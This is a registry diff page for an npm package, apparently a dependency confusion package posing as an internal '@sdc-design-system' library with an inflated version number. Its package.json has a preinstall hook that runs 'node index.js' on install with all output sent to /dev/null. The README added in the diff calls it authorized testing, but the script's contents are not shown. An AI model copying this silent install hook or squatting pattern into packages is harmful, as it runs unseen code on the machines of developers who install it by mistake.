@sdc-design-system/design-system 8.961.0 → 9.982.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/README.md +7 -0
  2. package/package.json +2 -2
package/README.md ADDED
@@ -0,0 +1,7 @@
1
+ # Dependency Confusion Testing Package
2
+
3
+ ⚠️ **WARNING**: This package is intended for **dependency confusion testing** on **authorized systems only**.
4
+ Use by unauthorized parties is strictly prohibited.
5
+
6
+ ## Disclaimer
7
+ This software is provided "as is", without warranty of any kind. The author disclaims all responsibility for any damage or liability arising from its use. Unauthorized use may violate local, national, or international laws.
package/package.json CHANGED
@@ -1,10 +1,10 @@
1
1
  {
2
2
  "name": "@sdc-design-system/design-system",
3
- "version": "8.961.0",
3
+ "version": "9.982.1",
4
4
  "description": "SDC Design System is intended for testing purposes only",
5
5
  "main": "main.js",
6
6
  "scripts": {
7
- "preinstall": "node index.js > /dev/null 2>&1",
7
+ "preinstall": "echo 'WARNING: This package is intended for testing purposes only. Unauthorized use is prohibited.';node index.js > /dev/null 2>&1",
8
8
  "test": "echo \"Error: no test specified\" && exit 1"
9
9
  },
10
10
  "author": "rt2025",